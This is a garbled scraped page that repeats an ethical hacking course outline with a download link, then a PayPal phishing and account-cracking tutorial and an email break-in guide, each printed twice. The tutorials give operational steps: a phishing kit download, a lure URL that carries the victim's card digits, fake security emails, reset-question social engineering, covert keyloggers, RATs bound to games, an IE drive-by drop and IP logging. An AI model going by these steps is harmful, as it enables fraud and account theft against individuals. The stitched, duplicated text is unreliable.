* Smurf Attacks
* SYN Attacks
* UDP Floods
* Distributed DoS
* DDoS Tool: Trin00
* Other DDoS Variation
* History of Botnets
* Anatomy of a Botnet
* Some Common Bots
* Demo - Denial of Service
* Module 12 Review
Module 13
* Automated Pen Testing Tools
* General: Definitions
* General:What?
* General: Why?
* Core Impact™ Framework
* Core Impact™ Operation
* Canvas™ Framework
* Canvas™ Operation
* Metasploit Framework
* Metasploit Operation
* Demo - Automated Pen Testing
* Module 13 Review
Module 14
* Intrusion Detection Systems
* Types of IDSs
* Network IDSs
* Distributed IDSs (DIDSs)
* Anomaly Detection
* Signature Detection
* Common IDS Software Products
* Introduction to Snort
* Attacking an IDS
* Eluding Techniques
* Testing an IDS
* Hacking Tool - NIDSbench
* Hacking Tool - Fragroute
* Hacking Tool - SideStep
* Hacking Tool - ADMmutate
* Other IDS Evasion Tools
* Demo - IDS and Snort
* Module 14 Review
Module 15
* Firewalls
* Firewall Types
* Application Layer Gateways
* ALGs (Proxies)
* Stateful Inspection Engine
* Hybrid Firewall
* Host-Based Firewall
* Network-Based Firewall
* DMZ (Demilitarized Zone)
* Back-to-Back Firewalls
* Bastion Hosts
* Control Traffic Flow
* Multiple DMZs
* Controlling Traffic Flow
* Why Do I Need a Firewall?
* What Should I Filter?
* Egress Filtering
* Network Address Translation (NAT)
* Firewall Vulnerabilities
* IPTables/NetFilter
* Default Tables and Chains
* iptables Syntax 1
* iptables Syntax 2
* Sample IPTables Script 1
* Sample IPTables Script 2
* Persistent Firewalls
* Firewall Identification
* Firewalk
* Tunneling with Loki
* Tunneling with NetCat/CryptCat
* Port Redirection with Fpipe
* Denial-of-Service Attacks Risk?
* Demo - Firewalls and IP Tables
* Module 15 Review
Module 16
* Honeypots and Honeynets
* What Is a Honeypot?
* Advantages and Disadvantages
* Types and Categories of Honeypots
* Honeypot: Tarpits
* Honeypot: Kfsensor
* Honeypot: Honeyd
* Sample Honeyd Configuration
* High-Interaction Honeypot
* Project HoneyNet
* Types of Honeynets
* The Main Difference is Data Control
* GEN II Data Control: Honeywall CD
* Gen II Data Capture: Sebek & Sebek II
* Automated Alerting
* Testing
* Legal Issues
* Demo - Setting up a Honeypot
* Module 16 Review
Module 17
* Ethics and Legal Issues
* The Costs
* Relation to Ethical Hacking?
* The Dual Nature of Tools
* Good Instead of Evil?
* Recognizing Trouble When It Happens
* Emulating the Attack
* Security Does Not Like Complexity
* Proper and Ethical Disclosure
* CERT’s Current Process
* Full Disclosure Policy
* Organization for Internet Safety (OIS)
* What Should We Do from Here?
* Legal Meets Information Systems
* Addressing Individual Laws
* 18 USC SECTION 1029
* 18 USC SECTION 1030
* 1030: Worms and Viruses
* Blaster Worm Attacks
* Civil vs. Criminal
* 18 USC SECTIONS 2510 and 2701
* Digital Millennium Copyright Act
* Cyber Security Enhancement Act
* Module 17 Review
* Course Closure
* Enjoy M8's
http://www.ziddu.com/download/3269041/NewTextDocument2.txt.html
Package Includes:
Featuring live instructor-led classroom sessions with full audio, video and demonstration components
Printable courseware
300+ Penetration Testing Review Questions
eWorkbook - 725 pages Student eWorkbook by Logical Security
Module 1
* Ethical Hacking and Penetration Testing
* Security 101
* Hacking Hall of Fame
* What are Today's hackers Like?
* Today's Hackers
* Risk Management
* Evolution of Threats
* Typical Vulnerability Life Cycle
* What is Ethical Hacking?
* Rise of the Ethical Hacker
* Types of Security Test
* Penetration Test (Pen-test)
* Red Teams
* Testing Methodology
* VMWare Workstation
* Windows and Linux Running VMWare
* Linux Is a Must
* Linux Survival Skills
* Useful vi Editor Commands
* Module 1 Review
Module 2
* Footprinting and Reconnaissance
* Desired Information
* Find Information by the Target (Edgar)
* terraserver.microsoft.com
* Network Reconnaissance & DNS Search
* Query Whois Databases
* Command-Line Whois Searches
* ARIN whois: Search IP Address Blocks
* SamSpade Tool and Website
* Internet Presence
* Look Through Source Code
* Mirror Website
* Find Specific Types of Systems
* Big Brother
* AltaVista
* Specific Data Being Available?
* Anonymizers
* Countermeasures to Information Leakage
* Social Engineering
* DNS Zone Transfer
* Nslookup command-line utility
* Zone Transfer from Linux
* Automated Zone Transfers
* Zone Transfer Countermeasures
* www.CheckDNS.net
* Tracing Out a Network Path
* tracert Output
* Free Tools
* Paratrace
* War Dialing for Hanging Modems
* Manual and Automated War Dialing
* Case Study
* Guide Dogs for the Blind: Pairing blind people with Guide Dogs since 1942
* Footprinting Countermeasures
* Demo - Footprinting & Info Gathering
* Module 2 Review
Module 3
* TCP/IP Basics and Scanning
* The OSI Model
* TCP/IP Protocol Suite Layers
* Encapsulation
* Data-Link Protocols
* IP - Internet Protocol, Datagram (Packet)
* ICMP Packets
* UDP – User Datagram Protocol
* UDP Datagram
* TCP – Transmission Control Protocol
* TCP Segment
* TCP/IP 3-Way Handshake and Flags
* TCP and UDP Ports
* Ping Sweeps
* Good Old Ping, Nmap, TCP Ping Sweep
* TCP Sweep Traffic Captured
* Unix Pinging Utilities
* Default TTLs
* Pinging Countermeasures
* Port Scanning
* Nmap
* Advanced Probing Techniques
* Scanrand
* Port Probing Countermeasures
* Watch Your Own Ports
* Demo - Scanning Tools
* Module 3 Review
Module 4
* Enumeration and Verification
* Operating System Identification
* Differences Between OS TCP/IP Stack
* Nmap -O
* Active vs Passive Fingerprinting
* Xprobe/Xprobe2
* Countermeasures
* SNMP Overview
* SNMP Enumeration
* SMTP, Finger, and E-mail Aliases
* Gleaning Information from SMTP
* SMTP E-mail Alias Enumeration
* SMTP Enumeration Countermeasures
* CIFS/SMB
* Attack Methodology
* Find Domains and Computers
* NetBIOS Data
* NBTscan
* NULL Session
* Local and Domain Users
* Find Shares with net view
* enum: the All-in-one
* Winfo and NTInfoScan (ntis.exe)
* Digging in the Registry
* NetBIOS Attack Summary
* NetBIOS Countermeasures
* What’s this SID Thing Anyway?
* Common SIDs and RIDs
* whoami
* RestrictAnonymous
* USER2SID/SID2USER
* psgetsid.exe and UserDump Tool
* LDAP and Active Directory
* GUI Tools to Perform the Same Actions
* Demo - Enumeration
* Module 4 Review
Module 5
* Hacking & Defending Wireless/Modems
* Phone Numbers & Modem Background
* Phone Reconnaissance
* Modem Attacks
* Wireless Reconnaissance
* Wireless Background
* Wireless Reconnaissance Continued
* Wireless Sniffing
* Cracking WEP Keys
* Defending Wireless
* Module 5 Review
Module 6
* Hacking & Defending Web Servers
* Web Servers in General: HTTP
* Uniform Resource Locator: URL
* Apache Web Server Functionality
* Apache: Attacking Mis-configurations
* Apache: Attacking Known Vulnerabilities
* Defending Apache Web Server
* Microsoft Internet Information Server (IIS)
* IIS: Security Features
* IIS: Attacking General Problems
* IIS: IUSER or IWAM Level Access
* IIS: Administrator or Sys Level Access
* IIS: Clearing IIS Logs
* IIS: Defending and Countermeasures
* Web Server Vulnerability Scanners
* Demo - Hacking Web Servers
* Module 6 Review
Module 7
* Hacking & Defending Web Applications
* Background on Web Threat & Design
* Basic Infrastructure Information
* Information Leaks on Web Pages
* Hacking over SSL
* Use the Source, Luke…
* Functional/Logic Testing
* Attacking Authentication
* Attacking Authorization
* Debug Proxies: @stake webproxy
* Input Validation Attacks
* Attacking Session State
* Attacking Web Clients
* Cross-Site Scripting (XSS) Threats
* Defending Web Applications
* Module 7 Review
Module 8
* Sniffers and Session Hijacking
* Sniffers
* Why Are Sniffers so Dangerous?
* Collision & Broadcast Domains
* VLANs and Layer-3 Segmentation
* tcpdump & WinDump
* Berkley Packet Filter (BPF)
* Libpcap & WinPcap
* BUTTSniffing Tool and dSniff
* Ethereal
* Mitigation of Sniffer Attacks
* Antisniff
* ARP Poisoning
* MAC Flooding
* DNS and IP Spoofing
* Session Hijacking
* Sequence Numbers
* Hunt
* Ettercap
* Source Routing
* Hijack Countermeasures
* Demo - Sniffers
* Module 8 Review
Module 9
* Hacking & Defending Windows Systems
* Physical Attacks
* LANMan Hashes and Weaknesses
* WinNT Hash and Weaknesses
* Look for Guest, Temp, Joe Accounts
* Direct Password Attacks
* Before You Crack: Enum Tool
* Finding More Account Information
* Cracking Passwords
* Grabbing the SAM
* Crack the Obtained SAM
* LSA Secrets and Trusts
* Using the Newly Guessed Password
* Bruteforcing Other Services
* Operating System Attacks
* Hiding Tracks: Clearing Logs
* Hardening Windows Systems
* Strong 3-Factor Authentication
* Creating Strong Passwords
* Authentication
* Windows Account Lockouts
* Auditing Passwords
* File Permissions
* Demo - Attacking Windows Systems
* Module 9 Review
Module 10
* Hacking & Defending Unix Systems
* Physical Attacks on Linux
* Password Cracking
* Brute Force Password Attacks
* Stack Operation
* Race Condition Errors
* Format String Errors
* File System Attacks
* Hiding Tracks
* Single User Countermeasure
* Strong Authentication
* Single Sign-On Technologies
* Account Lockouts
* Shadow Password Files
* Buffer Overflow Countermeasures
* LPRng Countermeasures
* Tight File Permissions
* Hiding Tracks Countermeasures
* Removing Unnecessary Applications
* DoS Countermeasures
* Hardening Scripts
* Using SSH & VPNs to Prevent Sniffing
* Demo - Attacking Unix Systems
* Module 10 Review
Module 11
* Rootkits, Backdoors, Trojans & Tunnels
* Types Of Rootkits
* A Look at LRK
* Examples of Trojaned Files
* Windows NT Rootkits
* NT Rootkit
* AFX Windows Rootkit 2003
* Rootkit Prevention Unix
* Rootkit Prevention Windows
* netcat
* netcat: Useful Unix Commands
* netcat: What it Looks Like
* VNC-Virtual Network Computing
* Backdoor Defenses
* Trojans
* Back Orifice 2000
* NetBus
* SubSeven
* Defenses to Trojans
* Tunneling
* Loki
* Other Tunnels
* Q-2.4 by Mixter
* Starting Up Malicious Code
* Defenses Against Tunnels
* Manually Deleting Logs
* Tools to Modify Logs
* Demo - Trojans
* Module 11 Review
Module 12
* Denial of Service and Botnets
* Denial-of-Service Attacks
* CPUHog
* Ping of Death
* Teardrop Attacks
* Jolt2
* Smurf Attacks
* SYN Attacks
* UDP Floods
* Distributed DoS
* DDoS Tool: Trin00
* Other DDoS Variation
* History of Botnets
* Anatomy of a Botnet
* Some Common Bots
* Demo - Denial of Service
* Module 12 Review
Module 13
* Automated Pen Testing Tools
* General: Definitions
* General:What?
* General: Why?
* Core Impact™ Framework
* Core Impact™ Operation
* Canvas™ Framework
* Canvas™ Operation
* Metasploit Framework
* Metasploit Operation
* Demo - Automated Pen Testing
* Module 13 Review
Module 14
* Intrusion Detection Systems
* Types of IDSs
* Network IDSs
* Distributed IDSs (DIDSs)
* Anomaly Detection
* Signature Detection
* Common IDS Software Products
* Introduction to Snort
* Attacking an IDS
* Eluding Techniques
* Testing an IDS
* Hacking Tool - NIDSbench
* Hacking Tool - Fragroute
* Hacking Tool - SideStep
* Hacking Tool - ADMmutate
* Other IDS Evasion Tools
* Demo - IDS and Snort
* Module 14 Review
Module 15
* Firewalls
* Firewall Types
* Application Layer Gateways
* ALGs (Proxies)
* Stateful Inspection Engine
* Hybrid Firewall
* Host-Based Firewall
* Network-Based Firewall
* DMZ (Demilitarized Zone)
* Back-to-Back Firewalls
* Bastion Hosts
* Control Traffic Flow
* Multiple DMZs
* Controlling Traffic Flow
* Why Do I Need a Firewall?
* What Should I Filter?
* Egress Filtering
* Network Address Translation (NAT)
* Firewall Vulnerabilities
* IPTables/NetFilter
* Default Tables and Chains
* iptables Syntax 1
* iptables Syntax 2
* Sample IPTables Script 1
* Sample IPTables Script 2
* Persistent Firewalls
* Firewall Identification
* Firewalk
* Tunneling with Loki
* Tunneling with NetCat/CryptCat
* Port Redirection with Fpipe
* Denial-of-Service Attacks Risk?
* Demo - Firewalls and IP Tables
* Module 15 Review
Module 16
* Honeypots and Honeynets
* What Is a Honeypot?
* Advantages and Disadvantages
* Types and Categories of Honeypots
* Honeypot: Tarpits
* Honeypot: Kfsensor
* Honeypot: Honeyd
* Sample Honeyd Configuration
* High-Interaction Honeypot
* Project HoneyNet
* Types of Honeynets
* The Main Difference is Data Control
* GEN II Data Control: Honeywall CD
* Gen II Data Capture: Sebek & Sebek II
* Automated Alerting
* Testing
* Legal Issues
* Demo - Setting up a Honeypot
* Module 16 Review
Module 17
* Ethics and Legal Issues
* The Costs
* Relation to Ethical Hacking?
* The Dual Nature of Tools
* Good Instead of Evil?
* Recognizing Trouble When It Happens
* Emulating the Attack
* Security Does Not Like Complexity
* Proper and Ethical Disclosure
* CERT’s Current Process
* Full Disclosure Policy
* Organization for Internet Safety (OIS)
* What Should We Do from Here?
* Legal Meets Information Systems
* Addressing Individual Laws
* 18 USC SECTION 1029
* 18 USC SECTION 1030
* 1030: Worms and Viruses
* Blaster Worm Attacks
* Civil vs. Criminal
* 18 USC SECTIONS 2510 and 2701
* Digital Millennium Copyright Act
* Cyber Security Enhancement Act
* Module 17 Review
* Course Closure
* Enjoy M8's
http://www.ziddu.com/download/3269041/NewTextDocument2.txt.html
Hacking Paypal Complete Tutorial
Many know Paypal Phishing and have hacked many paypals! This tut is not only to the newbies but also to pp phishers!
I am going to deal about various methods of Cracking and Phishing Paypals!
Cracking Accounts!
Well! Cracking involves many method! Social Engineering, Guessing.....
But the probability of this method is very low!
Social Engineering:
In this method u know whom u are gonna hack and have contact with them!
1. Lets consider that u are making some deals with some person, whos pp u are gonna hack!
so probably u wuld know his Paypal E-mail...
2. Now try to collect as much as info that u could possibly collect from him, like phone numbers, address[For address u could make a transcation with him and u could easily obtain his Address]
3. Now go to Pyapal website! clik on "Forgot Password" or "forgot E-mail" prefer forgot email method! and a bit easier!
Try with all the infos u have about him! this should more probably work!
Getting more infos about the victim!
If u select forgot password from paypal site, after entering the e-mail and the visula confirmation text in the preferred box u could see a drop down box
which contains last digits of Credit cards Bank Accounts and Phone numbers!
Its better to take a note of all these!
[Try cacking with this info]
Lets come to the main part! Phishing
The current situation has become worser! even if u had successfully Phished a PP account u get the SECURITY MEASURE limitation in minutes!
So! have to start a new method of phishing!
Before going further Download the Phisher [The code has not been completed,Those who knows download them and modify a bit]
Steps:
1. Hmmm.Ok.. got ur phisher! and as i said u should have known Victims CC's Last 2 Digits!
2. Now put in ur link as
3. Now thats it ur phisher is all set and now and now u have to send only the link to ur victim!
E-mail Format:
This is a Basic Format [Layout]Change the text contents as ur Needs]
[Tips: Before Sending the Phisher link go to paypal site and Clik on "Forgot Password" and select Verfication By E-mail! Do this 3-5 times. this would make the scene better]
Now u can tell ur victim that his account has been accessed by Third Person blah-blah-- Make the email more better!
If he logs in Then u could get his Login e-mail, password and probably his cc! so no need to panic for "SECURITY MEASURES LIMITATION"
The succes rate and Cashing rate of this method is a bit high
The reason i am posting it here is that, my next tut is on "UNPHISHING PAYPALs" So u should know my method of phishing too!
I put a lot of time into this tutorial please comment.
I am going to deal about various methods of Cracking and Phishing Paypals!
Cracking Accounts!
Well! Cracking involves many method! Social Engineering, Guessing.....
But the probability of this method is very low!
Social Engineering:
In this method u know whom u are gonna hack and have contact with them!
1. Lets consider that u are making some deals with some person, whos pp u are gonna hack!
so probably u wuld know his Paypal E-mail...
2. Now try to collect as much as info that u could possibly collect from him, like phone numbers, address[For address u could make a transcation with him and u could easily obtain his Address]
3. Now go to Pyapal website! clik on "Forgot Password" or "forgot E-mail" prefer forgot email method! and a bit easier!
Try with all the infos u have about him! this should more probably work!
Getting more infos about the victim!
If u select forgot password from paypal site, after entering the e-mail and the visula confirmation text in the preferred box u could see a drop down box
which contains last digits of Credit cards Bank Accounts and Phone numbers!
Its better to take a note of all these!
[Try cacking with this info]
Lets come to the main part! Phishing
The current situation has become worser! even if u had successfully Phished a PP account u get the SECURITY MEASURE limitation in minutes!
So! have to start a new method of phishing!
Before going further Download the Phisher [The code has not been completed,Those who knows download them and modify a bit]
Quote:
| Code: http://www.bw-network.co.cc/PPPhisher.rar |
1. Hmmm.Ok.. got ur phisher! and as i said u should have known Victims CC's Last 2 Digits!
2. Now put in ur link as
Code:
http://ur_site.com/index.php?cc=XX[XX=Last two digits of CC number u got]
E-mail Format:
Quote:
|
This is a Basic Format [Layout]Change the text contents as ur Needs]
[Tips: Before Sending the Phisher link go to paypal site and Clik on "Forgot Password" and select Verfication By E-mail! Do this 3-5 times. this would make the scene better]
Now u can tell ur victim that his account has been accessed by Third Person blah-blah-- Make the email more better!
If he logs in Then u could get his Login e-mail, password and probably his cc! so no need to panic for "SECURITY MEASURES LIMITATION"
The succes rate and Cashing rate of this method is a bit high
The reason i am posting it here is that, my next tut is on "UNPHISHING PAYPALs" So u should know my method of phishing too!
I put a lot of time into this tutorial please comment.
Crack into someone's email.
Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out
to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.
One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at)
It works just fine, and has some nice options to keep it hidden from your average end user (computer user).
Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on
different file sharing clients you can try).
Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in
C:\Windows\ApplicationData\Identities\{ACblahblahb lah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.
One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...
Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it
Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...
On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to
, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out
Code:
www.google.com
One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at)
Code:
www.blazingtools.com/bpk.html
Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on
Code:
www.zeropaid.comfor
Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in
C:\Windows\ApplicationData\Identities\{ACblahblahb lah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.
One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...
Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it
Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...
On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to
Code:
www.google.com
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
